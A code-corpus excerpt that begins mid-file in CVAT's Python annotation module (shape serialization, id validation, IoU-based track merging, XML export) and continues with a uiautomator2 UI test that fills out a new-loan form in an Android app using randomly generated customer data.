for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
self._get_shape_set(shape_type).all().delete()
def delete_all_paths_from_db(self):
self.db_job.objectpath_set.all().delete()
def delete_from_db(self, data):
self._delete_shapes_from_db(data)
self._delete_paths_from_db(data)
def update_in_db(self, data):
if self.init_from_client(data):
self._update_shapes_in_db()
self._update_paths_in_db()
def save_to_db(self, data):
if self.init_from_client(data):
self._save_shapes_to_db()
self._save_paths_to_db()
def to_client(self):
data = {
"boxes": [],
"box_paths": [],
"polygons": [],
"polygon_paths": [],
"polylines": [],
"polyline_paths": [],
"points": [],
"points_paths": [],
}
for box in self.boxes:
data["boxes"].append({
"id": box.client_id,
"label_id": box.label.id,
"group_id": box.group_id,
"xtl": box.xtl,
"ytl": box.ytl,
"xbr": box.xbr,
"ybr": box.ybr,
"occluded": box.occluded,
"z_order": box.z_order,
"frame": box.frame,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in box.attributes],
})
for poly_type in ['polygons', 'polylines', 'points']:
for poly in getattr(self, poly_type):
data[poly_type].append({
"id": poly.client_id,
"label_id": poly.label.id,
"group_id": poly.group_id,
"points": poly.points,
"occluded": poly.occluded,
"z_order": poly.z_order,
"frame": poly.frame,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in poly.attributes],
})
for box_path in self.box_paths:
data["box_paths"].append({
"id": box_path.client_id,
"label_id": box_path.label.id,
"group_id": box_path.group_id,
"frame": box_path.frame,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in box_path.attributes],
"shapes": [box for box in map(lambda box:
({
"frame": box.frame,
"xtl": box.xtl,
"ytl": box.ytl,
"xbr": box.xbr,
"ybr": box.ybr,
"occluded": box.occluded,
"z_order": box.z_order,
"outside": box.outside,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in box.attributes],
}), box_path.boxes)
],
})
for poly_path_type in ['polygon_paths', 'polyline_paths', 'points_paths']:
for poly_path in getattr(self, poly_path_type):
data[poly_path_type].append({
"id": poly_path.client_id,
"label_id": poly_path.label.id,
"group_id": poly_path.group_id,
"frame": poly_path.frame,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in poly_path.attributes],
"shapes": [shape for shape in map(lambda shape:
({
"frame": shape.frame,
"points": shape.points,
"occluded": shape.occluded,
"z_order": shape.z_order,
"outside": shape.outside,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in shape.attributes],
}), poly_path.shapes)
],
})
return data
def validate_data_from_client(self, data):
client_ids = {
'saved': self._get_client_ids_from_db(),
'create': set(),
'update': set(),
'delete': set(),
}
def extract_client_id(shape, action):
if action != 'delete':
if 'id' not in shape:
raise Exception('No id field in received data')
client_id = shape['id']
else:
# the client sends only shape.id, not the shape object
client_id = shape
client_ids[action].add(client_id)
shape_types = ['boxes', 'points', 'polygons', 'polylines', 'box_paths',
'points_paths', 'polygon_paths', 'polyline_paths']
for action in ['create', 'update', 'delete']:
for shape_type in shape_types:
for shape in data[action][shape_type]:
extract_client_id(shape, action)
# For the delete action, the set of IDs to delete may legitimately
# intersect the set of IDs to create (e.g. when saving uploaded
# annotations), so that combination is not checked here.
tmp_res = (client_ids['create'] & client_ids['update']) | (client_ids['update'] & client_ids['delete'])
if tmp_res:
raise Exception('More than one action for shape(s) with id={}'.format(tmp_res))
tmp_res = (client_ids['saved'] - client_ids['delete']) & client_ids['create']
if tmp_res:
raise Exception('Trying to create new shape(s) with existing client id {}'.format(tmp_res))
tmp_res = client_ids['delete'] - client_ids['saved']
if tmp_res:
raise Exception('Trying to delete shape(s) with nonexistent client id {}'.format(tmp_res))
tmp_res = client_ids['update'] - (client_ids['saved'] - client_ids['delete'])
if tmp_res:
raise Exception('Trying to update shape(s) with nonexistent client id {}'.format(tmp_res))
max_id = self.db_job.max_shape_id
if any(new_client_id <= max_id for new_client_id in client_ids['create']):
raise Exception('Trying to create shape(s) with client id {} less than allowed value {}'.format(client_ids['create'], max_id))
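# Worked example (hypothetical ids): with saved={1, 2}, create={5},
# update={2} and delete={1}, all four set checks above pass (and create
# passes the max_id check as long as 5 > max_shape_id); create={2} instead
# would trip the "existing client id" check, because 2 is saved and not
# scheduled for deletion.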
return client_ids
def force_set_client_id(self, data):
shape_types = ['boxes', 'points', 'polygons', 'polylines', 'box_paths',
'points_paths', 'polygon_paths', 'polyline_paths']
max_id = self.db_job.max_shape_id
for shape_type in shape_types:
if not data[shape_type]:
continue
for shape in data[shape_type]:
if 'id' in shape:
max_id = max(max_id, shape['id'])
max_id += 1
for shape_type in shape_types:
for shape in data[shape_type]:
if 'id' not in shape or shape['id'] == -1:
shape['id'] = max_id
max_id += 1
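# Worked example (hypothetical): with max_shape_id = 7 and incoming shapes
# carrying ids [3, -1, 12], the first pass raises max_id past the largest
# existing id, and the second pass assigns the shape with id == -1 a fresh
# id greater than 12; the existing ids 3 and 12 are kept as sent.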
class _AnnotationForSegment(_Annotation):
def __init__(self, db_segment):
super().__init__(db_segment.start_frame, db_segment.stop_frame)
self.db_segment = db_segment
def init_from_db(self):
# FIXME: at the moment a segment always has exactly one job, so this
# implementation is sufficient. A proper multi-job implementation is
# needed in the future.
self.reset()
db_job0 = list(self.db_segment.job_set.all())[0]
annotation = _AnnotationForJob(db_job0)
annotation.init_from_db()
self.boxes = annotation.boxes
self.box_paths = annotation.box_paths
self.polygons = annotation.polygons
self.polygon_paths = annotation.polygon_paths
self.polylines = annotation.polylines
self.polyline_paths = annotation.polyline_paths
self.points = annotation.points
self.points_paths = annotation.points_paths
@plugin_decorator
def _dump(tid, data_format, scheme, host, plugin_meta_data):
# For big tasks the dump function may run for a long time, and we don't
# need to hold the lock after the _AnnotationForTask instance has been
# initialized from the DB. However, there is a bug with a corrupted dump
# file when two or more dump requests are received at the same time.
# https://github.com/opencv/cvat/issues/217
with transaction.atomic():
db_task = models.Task.objects.select_for_update().get(id=tid)
annotation = _AnnotationForTask(db_task)
annotation.init_from_db()
annotation.dump(data_format, scheme, host, plugin_meta_data)
def _calc_box_area(box):
return (box.xbr - box.xtl) * (box.ybr - box.ytl)
def _calc_overlap_box_area(box0, box1):
dx = min(box0.xbr, box1.xbr) - max(box0.xtl, box1.xtl)
dy = min(box0.ybr, box1.ybr) - max(box0.ytl, box1.ytl)
if dx > 0 and dy > 0:
return dx * dy
else:
return 0
def _calc_box_IoU(box0, box1):
overlap_area = _calc_overlap_box_area(box0, box1)
return overlap_area / (_calc_box_area(box0) + _calc_box_area(box1) - overlap_area)
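# Worked example (a sanity check, not part of the original module): two unit
# squares offset by half a side overlap in a 0.5 x 1 strip, so
# IoU = 0.5 / (1 + 1 - 0.5) = 1/3. With a namedtuple standing in for a box:
#
#   from collections import namedtuple
#   _Box = namedtuple('_Box', ['xtl', 'ytl', 'xbr', 'ybr'])
#   assert abs(_calc_box_IoU(_Box(0, 0, 1, 1), _Box(0.5, 0, 1.5, 1)) - 1/3) < 1e-9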
class _AnnotationWriter:
__metaclass__ = ABCMeta
def __init__(self, file, version):
self.version = version
self.file = file
@abstractmethod
def open_root(self):
raise NotImplementedError
@abstractmethod
def add_meta(self, meta):
raise NotImplementedError
@abstractmethod
def open_track(self, track):
raise NotImplementedError
@abstractmethod
def open_image(self, image):
raise NotImplementedError
@abstractmethod
def open_box(self, box):
raise NotImplementedError
@abstractmethod
def open_polygon(self, polygon):
raise NotImplementedError
@abstractmethod
def open_polyline(self, polyline):
raise NotImplementedError
@abstractmethod
def open_points(self, points):
raise NotImplementedError
@abstractmethod
def add_attribute(self, attribute):
raise NotImplementedError
@abstractmethod
def close_box(self):
raise NotImplementedError
@abstractmethod
def close_polygon(self):
raise NotImplementedError
@abstractmethod
def close_polyline(self):
raise NotImplementedError
@abstractmethod
def close_points(self):
raise NotImplementedError
@abstractmethod
def close_image(self):
raise NotImplementedError
@abstractmethod
def close_track(self):
raise NotImplementedError
@abstractmethod
def close_root(self):
raise NotImplementedError
class _XmlAnnotationWriter(_AnnotationWriter):
def __init__(self, file):
super().__init__(file, "1.1")
self.xmlgen = XMLGenerator(self.file, 'utf-8')
self._level = 0
def _indent(self, newline = True):
if newline:
self.xmlgen.ignorableWhitespace("\n")
self.xmlgen.ignorableWhitespace(" " * self._level)
def _add_version(self):
self._indent()
self.xmlgen.startElement("version", {})
self.xmlgen.characters(self.version)
self.xmlgen.endElement("version")
def open_root(self):
self.xmlgen.startDocument()
self.xmlgen.startElement("annotations", {})
self._level += 1
self._add_version()
def _add_meta(self, meta):
self._level += 1
for k, v in meta.items():
if isinstance(v, OrderedDict):
self._indent()
self.xmlgen.startElement(k, {})
self._add_meta(v)
self._indent()
self.xmlgen.endElement(k)
elif isinstance(v, list):
self._indent()
self.xmlgen.startElement(k, {})
for tup in v:
self._add_meta(OrderedDict([tup]))
self._indent()
self.xmlgen.endElement(k)
else:
self._indent()
self.xmlgen.startElement(k, {})
self.xmlgen.characters(v)
self.xmlgen.endElement(k)
self._level -= 1
def add_meta(self, meta):
self._indent()
self.xmlgen.startElement("meta", {})
self._add_meta(meta)
self._indent()
self.xmlgen.endElement("meta")
def open_track(self, track):
self._indent()
self.xmlgen.startElement("track", track)
self._level += 1
def open_image(self, image):
self._indent()
self.xmlgen.startElement("image", image)
self._level += 1
def open_box(self, box):
self._indent()
self.xmlgen.startElement("box", box)
self._level += 1
def open_polygon(self, polygon):
self._indent()
self.xmlgen.startElement("polygon", polygon)
self._level += 1
def open_polyline(self, polyline):
self._indent()
self.xmlgen.startElement("polyline", polyline)
self._level += 1
def open_points(self, points):
self._indent()
self.xmlgen.startElement("points", points)
self._level += 1
def add_attribute(self, attribute):
self._indent()
self.xmlgen.startElement("attribute", {"name": attribute["name"]})
self.xmlgen.characters(attribute["value"])
self.xmlgen.endElement("attribute")
def close_box(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("box")
def close_polygon(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("polygon")
def close_polyline(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("polyline")
def close_points(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("points")
def close_image(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("image")
def close_track(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("track")
def close_root(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("annotations")
self.xmlgen.endDocument()
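# Usage sketch (hypothetical, with an in-memory file object):
#
#   import io
#   buf = io.StringIO()
#   writer = _XmlAnnotationWriter(buf)
#   writer.open_root()
#   writer.open_box({"label": "car", "xtl": "0.00", "ytl": "0.00",
#                    "xbr": "10.00", "ybr": "10.00"})
#   writer.add_attribute({"name": "color", "value": "red"})
#   writer.close_box()
#   writer.close_root()
#   # buf.getvalue() now holds an <annotations> document with one <box>.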
class _AnnotationForTask(_Annotation):
def __init__(self, db_task):
super().__init__(0, db_task.size)
self.db_task = db_task
def init_from_db(self):
self.reset()
for db_segment in self.db_task.segment_set.all():
annotation = _AnnotationForSegment(db_segment)
annotation.init_from_db()
self._merge_boxes(annotation.boxes, db_segment.start_frame,
self.db_task.overlap)
self._merge_paths(annotation.box_paths, db_segment.start_frame,
self.db_task.overlap)
self.polygons.extend(annotation.polygons)
self.polylines.extend(annotation.polylines)
self.points.extend(annotation.points)
self.polygon_paths.extend(annotation.polygon_paths)
self.polyline_paths.extend(annotation.polyline_paths)
self.points_paths.extend(annotation.points_paths)
# FIXME PolyShapes merge???
def _merge_paths(self, paths, start_frame, overlap):
# 1. Split paths into two parts: new paths and paths which may
# intersect existing paths.
new_paths = [path for path in paths
if path.frame >= start_frame + overlap]
int_paths = [path for path in paths
if path.frame < start_frame + overlap]
assert len(new_paths) + len(int_paths) == len(paths)
# 2. Find old paths which intersect int_paths
old_paths = []
for path in self.box_paths:
box = path.get_interpolated_boxes()[-1]
if box.frame >= start_frame:
old_paths.append(path)
# 3. Add new paths as is. It should be done only after the old_paths
# variable is initialized.
self.box_paths.extend(new_paths)
# Nothing to merge. Just add all int_paths if any.
if not old_paths or not int_paths:
self.box_paths.extend(int_paths)
return
# 4. Build a cost matrix for each path and find the correspondence
# using the Hungarian algorithm.
min_cost_thresh = 0.5
cost_matrix = np.empty(shape=(len(int_paths), len(old_paths)),
dtype=float)
for i, int_path in enumerate(int_paths):
for j, old_path in enumerate(old_paths):
cost_matrix[i][j] = 1
if int_path.label.id == old_path.label.id:
# Here start_frame is the start frame of the next segment
# and stop_frame is the stop frame of the current segment
stop_frame = start_frame + overlap - 1
int_boxes = int_path.get_interpolated_boxes()
old_boxes = old_path.get_interpolated_boxes()
int_boxes = {box.frame:box for box in int_boxes if box.frame <= stop_frame}
old_boxes = {box.frame:box for box in old_boxes if box.frame >= start_frame}
assert int_boxes and old_boxes
count, error = 0, 0
for frame in range(start_frame, stop_frame + 1):
box0, box1 = int_boxes.get(frame), old_boxes.get(frame)
if box0 and box1:
if box0.outside != box1.outside:
error += 1
else:
error += 1 - _calc_box_IoU(box0, box1)
count += 1
elif box0 or box1:
error += 1
count += 1
cost_matrix[i][j] = error / count
# 5. Find the optimal solution using the Hungarian algorithm.
row_ind, col_ind = linear_sum_assignment(cost_matrix)
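# Illustrative note (assumption, not original code): for a 2x2 cost matrix
# [[0.1, 0.9], [0.8, 0.2]], linear_sum_assignment returns row_ind=[0, 1],
# col_ind=[0, 1] (total cost 0.3); each matched pair is then accepted only
# if its cost is at most min_cost_thresh.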
int_paths_indexes = list(range(0, len(int_paths)))
for i, j in zip(row_ind, col_ind):
# Reject the solution if the cost is too high. Mark handled paths
# in int_paths_indexes.
if cost_matrix[i][j] <= min_cost_thresh:
old_paths[j].merge(int_paths[i])
int_paths_indexes[i] = -1
# 6. Add all paths which were not processed.
for i in int_paths_indexes:
if i != -1:
self.box_paths.append(int_paths[i])
def _merge_boxes(self, boxes, start_frame, overlap):
# 1. Split boxes into two parts: new boxes and boxes which may
# intersect existing boxes.
new_boxes = [box for box in boxes
if box.frame >= start_frame + overlap]
int_boxes = [box for box in boxes
if box.frame < start_frame + overlap]
assert len(new_boxes) + len(int_boxes) == len(boxes)
# 2. Convert to a more convenient data structure (boxes by frame)
int_boxes_by_frame = {}
for box in int_boxes:
if box.frame in int_boxes_by_frame:
int_boxes_by_frame[box.frame].append(box)
else:
int_boxes_by_frame[box.frame] = [box]
old_boxes_by_frame = {}
for box in self.boxes:
if box.frame >= start_frame:
if box.frame in old_boxes_by_frame:
old_boxes_by_frame[box.frame].append(box)
else:
old_boxes_by_frame[box.frame] = [box]
# 3. Add new boxes as is. It should be done only after the
# old_boxes_by_frame variable is initialized.
self.boxes.extend(new_boxes)
# Nothing to merge here. Just add all int_boxes if any.
if not old_boxes_by_frame or not int_boxes_by_frame:
self.boxes.extend(int_boxes)
return
# 4. Build a cost matrix for each frame and find the correspondence
# using the Hungarian algorithm. In this case min_cost_thresh is
# stricter because we compare shapes on a single frame only.
min_cost_thresh = 0.25
for frame in int_boxes_by_frame:
if frame in old_boxes_by_frame:
int_boxes = int_boxes_by_frame[frame]
old_boxes = old_boxes_by_frame[frame]
cost_matrix = np.empty(shape=(len(int_boxes), len(old_boxes)),
dtype=float)
# 4.1 Construct the cost matrix for the frame.
for i, box0 in enumerate(int_boxes):
for j, box1 in enumerate(old_boxes):
if box0.label.id == box1.label.id:
cost_matrix[i][j] = 1 - _calc_box_IoU(box0, box1)
else:
cost_matrix[i][j] = 1
# 5. Find the optimal solution using the Hungarian algorithm.
row_ind, col_ind = linear_sum_assignment(cost_matrix)
int_boxes_indexes = list(range(0, len(int_boxes)))
for i, j in zip(row_ind, col_ind):
# Reject the solution if the cost is too high. Mark handled boxes
# in int_boxes_indexes.
if cost_matrix[i][j] <= min_cost_thresh:
old_boxes[j].merge(int_boxes[i])
int_boxes_indexes[i] = -1
# 6. Add all boxes which were not processed.
for i in int_boxes_indexes:
if i != -1:
self.boxes.append(int_boxes[i])
else:
# We don't have old boxes on the frame. Let's add all new ones.
self.boxes.extend(int_boxes_by_frame[frame])
def dump(self, data_format, scheme, host, plugin_meta_data):
def _flip_box(box, im_w, im_h):
box.xbr, box.xtl = im_w - box.xtl, im_w - box.xbr
box.ybr, box.ytl = im_h - box.ytl, im_h - box.ybr
def _flip_shape(shape, im_w, im_h):
points = []
for p in shape.points.split(' '):
p = p.split(',')
points.append({
'x': p[0],
'y': p[1]
})
for p in points:
p['x'] = im_w - (float(p['x']) + 1)
p['y'] = im_h - (float(p['y']) + 1)
shape.points = ' '.join(['{},{}'.format(point['x'], point['y']) for point in points])
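# Worked example (explanatory, not original): with im_w = 100, a point at
# x = 10 maps to 100 - (10 + 1) = 89, i.e. the flip mirrors 0-indexed pixel
# coordinates; _flip_box above mirrors the box corners the same way and
# swaps them to keep xtl <= xbr.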
db_task = self.db_task
db_segments = db_task.segment_set.all().prefetch_related('job_set')
db_labels = db_task.label_set.all().prefetch_related('attributespec_set')
im_meta_data = get_image_meta_cache(db_task)
meta = OrderedDict([
("task", OrderedDict([
("id", str(db_task.id)),
("name", db_task.name),
("size", str(db_task.size)),
("mode", db_task.mode),
("overlap", str(db_task.overlap)),
("bugtracker", db_task.bug_tracker),
("flipped", str(db_task.flipped)),
("created", str(timezone.localtime(db_task.created_date))),
("updated", str(timezone.localtime(db_task.updated_date))),
("source", db_task.source),
("labels", [
("label", OrderedDict([
("name", db_label.name),
("attributes", [("attribute", db_attr.text)
for db_attr in db_label.attributespec_set.all()])
])) for db_label in db_labels
]),
("segments", [
("segment", OrderedDict([
("id", str(db_segment.id)),
("start", str(db_segment.start_frame)),
("stop", str(db_segment.stop_frame)),
("url", "{0}://{1}/?id={2}".format(
scheme, host, db_segment.job_set.all()[0].id))
])) for db_segment in db_segments
]),
("owner", OrderedDict([
("username", db_task.owner.username),
("email", db_task.owner.email)
]) if db_task.owner else ""),
])),
("dumped", str(timezone.localtime(timezone.now())))
])
meta.update(plugin_meta_data)
if db_task.mode == "interpolation":
meta["task"]["original_size"] = OrderedDict([
("width", str(im_meta_data["original_size"][0]["width"])),
("height", str(im_meta_data["original_size"][0]["height"]))
])
dump_path = db_task.get_dump_path()
with open(dump_path, "w") as dump_file:
dumper = _XmlAnnotationWriter(dump_file)
dumper.open_root()
dumper.add_meta(meta)
if db_task.mode == "annotation":
shapes = {}
shapes["boxes"] = {}
shapes["polygons"] = {}
shapes["polylines"] = {}
shapes["points"] = {}
boxes = self.to_boxes()
for box in boxes:
if box.frame not in shapes["boxes"]:
shapes["boxes"][box.frame] = []
shapes["boxes"][box.frame].append(box)
polygons = self.to_polygons()
for polygon in polygons:
if polygon.frame not in shapes["polygons"]:
shapes["polygons"][polygon.frame] = []
shapes["polygons"][polygon.frame].append(polygon)
polylines = self.to_polylines()
for polyline in polylines:
if polyline.frame not in shapes["polylines"]:
shapes["polylines"][polyline.frame] = []
shapes["polylines"][polyline.frame].append(polyline)
points_shapes = self.to_points()
for points in points_shapes:
if points.frame not in shapes["points"]:
shapes["points"][points.frame] = []
shapes["points"][points.frame].append(points)
for frame in sorted(set(list(shapes["boxes"].keys()) +
list(shapes["polygons"].keys()) +
list(shapes["polylines"].keys()) +
list(shapes["points"].keys()))):
link = get_frame_path(db_task.id, frame)
path = os.readlink(link)
rpath = path.split(os.path.sep)
rpath = os.path.sep.join(rpath[rpath.index(".upload")+1:])
im_w = im_meta_data['original_size'][frame]['width']
im_h = im_meta_data['original_size'][frame]['height']
dumper.open_image(OrderedDict([
("id", str(frame)),
("name", rpath),
("width", str(im_meta_data['original_size'][frame]["width"])),
("height", str(im_meta_data['original_size'][frame]["height"]))
]))
for shape_type in ["boxes", "polygons", "polylines", "points"]:
shape_dict = shapes[shape_type]
if frame in shape_dict:
for shape in shape_dict[frame]:
if shape_type == "boxes":
if db_task.flipped:
_flip_box(shape, im_w, im_h)
dump_dict = OrderedDict([
("label", shape.label.name),
("xtl", "{:.2f}".format(shape.xtl)),
("ytl", "{:.2f}".format(shape.ytl)),
("xbr", "{:.2f}".format(shape.xbr)),
("ybr", "{:.2f}".format(shape.ybr)),
("occluded", str(int(shape.occluded))),
])
if db_task.z_order:
dump_dict['z_order'] = str(shape.z_order)
if shape.group_id:
dump_dict['group_id'] = str(shape.group_id)
dumper.open_box(dump_dict)
else:
if db_task.flipped:
_flip_shape(shape, im_w, im_h)
dump_dict = OrderedDict([
("label", shape.label.name),
("points", ';'.join((
','.join((
"{:.2f}".format(float(p.split(',')[0])),
"{:.2f}".format(float(p.split(',')[1]))
)) for p in shape.points.split(' '))
)),
("occluded", str(int(shape.occluded))),
])
if db_task.z_order:
dump_dict['z_order'] = str(shape.z_order)
if shape.group_id:
dump_dict['group_id'] = str(shape.group_id)
if shape_type == "polygons":
dumper.open_polygon(dump_dict)
elif shape_type == "polylines":
dumper.open_polyline(dump_dict)
else:
dumper.open_points(dump_dict)
for attr in shape.attributes:
dumper.add_attribute(OrderedDict([
("name", attr.name),
("value", attr.value)
]))
if shape_type == "boxes":
dumper.close_box()
elif shape_type == "polygons":
dumper.close_polygon()
elif shape_type == "polylines":
dumper.close_polyline()
else:
dumper.close_points()
dumper.close_image()
else:
paths = {}
paths["boxes"] = self.to_box_paths()
paths["polygons"] = self.to_polygon_paths()
paths["polylines"] = self.to_polyline_paths()
paths["points"] = self.to_points_paths()
im_w = im_meta_data['original_size'][0]['width']
im_h = im_meta_data['original_size'][0]['height']
counter = 0
for shape_type in ["boxes", "polygons", "polylines", "points"]:
path_list = paths[shape_type]
for path in path_list:
path_id = path.client_id if path.client_id != -1 else counter
counter += 1
dump_dict = OrderedDict([
("id", str(path_id)),
("label", path.label.name),
])
if path.group_id:
dump_dict['group_id'] = str(path.group_id)
dumper.open_track(dump_dict)
if shape_type == "boxes":
for box in path.get_interpolated_boxes():
if db_task.flipped:
_flip_box(box, im_w, im_h)
dump_dict = OrderedDict([
("frame", str(box.frame)),
("xtl", "{:.2f}".format(box.xtl)),
("ytl", "{:.2f}".format(box.ytl)),
("xbr", "{:.2f}".format(box.xbr)),
("ybr", "{:.2f}".format(box.ybr)),
("outside", str(int(box.outside))),
("occluded", str(int(box.occluded))),
("keyframe", str(int(box.keyframe)))
])
if db_task.z_order:
dump_dict["z_order"] = str(box.z_order)
dumper.open_box(dump_dict)
for attr in path.attributes + box.attributes:
dumper.add_attribute(OrderedDict([
("name", attr.name),
("value", attr.value)
]))
dumper.close_box()
else:
for shape in path.get_interpolated_shapes():
if db_task.flipped:
_flip_shape(shape, im_w, im_h)
dump_dict = OrderedDict([
("frame", str(shape.frame)),
("points", ';'.join((
','.join((
"{:.2f}".format(float(p.split(',')[0])),
"{:.2f}".format(float(p.split(',')[1]))
)) for p in shape.points.split(' '))
)),
("outside", str(int(shape.outside))),
("occluded", str(int(shape.occluded))),
("keyframe", str(int(shape.keyframe)))
])
if db_task.z_order:
dump_dict["z_order"] = str(shape.z_order)
if shape_type == "polygons":
dumper.open_polygon(dump_dict)
elif shape_type == "polylines":
dumper.open_polyline(dump_dict)
else:
dumper.open_points(dump_dict)
for attr in path.attributes + shape.attributes:
dumper.add_attribute(OrderedDict([
("name", attr.name),
("value", attr.value)
]))
if shape_type == "polygons":
dumper.close_polygon()
elif shape_type == "polylines":
dumper.close_polyline()
else:
dumper.close_points()
dumper.close_track()
dumper.close_root()
``` |
{
"source": "100440175/uiautomator2",
"score": 2
} |
#### File: examples/com.xiaoxiao.ludan/test_new_loan.py
```python
from config.random_date import *
import uiautomator2 as u2
import unittest
import time
from utx import *
import uiautomator2.ext.ocr as ocr
class TestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.d = u2.connect()
ocr.API = "http://ocr.open.netease.com/api/ocr"
u2.plugin_register("ocr", ocr.OCR)
cls.d.set_orientation('natural')
cls.d.healthcheck()
cls.d.implicitly_wait(10)
cls.d.app_clear("com.xiaoxiao.ludan")
cls.d.app_stop_all()
cls.NowTime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
cls.test_random = test_random_date()
Case_DIR = os.path.abspath(os.path.dirname(__file__))
cls.loanID_PATH = os.path.join(Case_DIR, "config", "loan_info.txt")
def setUp(self):
self.d.set_fastinput_ime(True)
self.sess = self.d.session("com.xiaoxiao.ludan")
self.name = self.test_random.get_name()
self.phone = self.test_random.createPhone()
self.idcard = self.test_random.idcard_generator()
def tearDown(self):
self.d.app_stop_all()
self.d.set_fastinput_ime(False)
def login(self,username,password):
d = self.sess
d.watchers.remove()
d.watchers.watched = False
log.info('Starting login >>>>>>>>>>')
d.watcher("获取app权限").when(resourceId="android:id/button1").when(text="允许").click(text="允许")
d.watchers.run()
d(resourceId="com.xiaoxiao.ludan:id/et_account").set_text(username,timeout=10)
d(resourceId="com.xiaoxiao.ludan:id/et_password").set_text(password,timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/bt_login").click_exists(timeout=5)
if d(resourceId="com.xiaoxiao.ludan:id/title").exists(timeout=2) == True:
d(resourceId="com.xiaoxiao.ludan:id/ed_vc").set_text('8888',timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_sign").click(timeout=5)
else:
pass
self.assertTrue(d(text=u"首页").exists(timeout=3),msg=d.toast.get_message(10, 5))
log.info('Server response: %s' % d.toast.get_message(10, 10))
print('Server response: %s' % d.toast.get_message(10, 10))
@tag(Tag.FULL)
def test_new_loan(self):
""" 业务员新建报单
:return:
"""
d = self.sess
self.login(81,12345678)
log.info('Starting a new loan application >>>>>>>>>>')
d(resourceId="com.xiaoxiao.ludan:id/tv_menu", text=u"快速报单").click(timeout=10)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"合同费用").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").exists(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"合同费用").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").clear_text()
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"合同费用").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(u"测试数据 - %s" % self.NowTime,timeout=2)
d(scrollable=True).scroll.to(text="新增客户")
d(resourceId="com.xiaoxiao.ludan:id/tv_edit_title",text="合同项目").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").clear_text()
d(resourceId="com.xiaoxiao.ludan:id/tv_edit_title",text="合同项目").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(u"测试数据 - %s" % self.NowTime,timeout=2)
d.swipe(0.1, 0.9, 0.9, 0.1,duration=0.5)
d(resourceId="com.xiaoxiao.ludan:id/tv_right").click_exists(timeout=5)
log.info('Randomly generated customer name: %s' % self.name)
print('Randomly generated customer name: %s' % self.name)
log.info('Randomly generated phone number: %s' % self.phone)
print('Randomly generated phone number: %s' % self.phone)
log.info('Randomly generated ID number: %s' % self.idcard)
print('Randomly generated ID number: %s' % self.idcard)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"姓名").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").exists(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"姓名").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").clear_text()
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"姓名").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(self.name)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"手机号").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(self.phone)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"证件类型").sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click()
if d(resourceId="com.xiaoxiao.ludan:id/tv_type", text=u"香港身份证").exists(timeout=3) == True:
d(resourceId="com.xiaoxiao.ludan:id/tv_type", text=u"香港身份证").click(timeout=5)
else:
self.d.ext_ocr.all()
self.d.ext_ocr("香港身份证").click(timeout=3)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"证件号码").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(self.idcard)
d(resourceId="com.xiaoxiao.ludan:id/right").click(timeout=5)
if d(resourceId="com.xiaoxiao.ludan:id/title",text='快速报单').exists(timeout=3) == True:
d(resourceId="com.xiaoxiao.ludan:id/right").click_exists(timeout=5)
self.assertTrue(d(resourceId="com.xiaoxiao.ludan:id/title", text='报单详情').exists(timeout=3),msg=d.toast.get_message(10, 5))
d(resourceId="com.xiaoxiao.ludan:id/iv_right").click_exists(timeout=10)
d(text='新增贷款').click(timeout=5)
if d(resourceId="com.xiaoxiao.ludan:id/title", text=u'贷款信息').exists(timeout=5) == True:
log.info(d.toast.get_message(10, 5))
print(d.toast.get_message(10, 5))
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u'申请银行').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(text='工商银行').click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u'银行产品').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(text='抵押贷').click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u'贷款类型').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(text='抵押贷').click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"申请金额").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text('50000')
# d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text='申请客户').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u'按 揭 员').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(text='黄蓉').click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_yes").click(timeout=5)
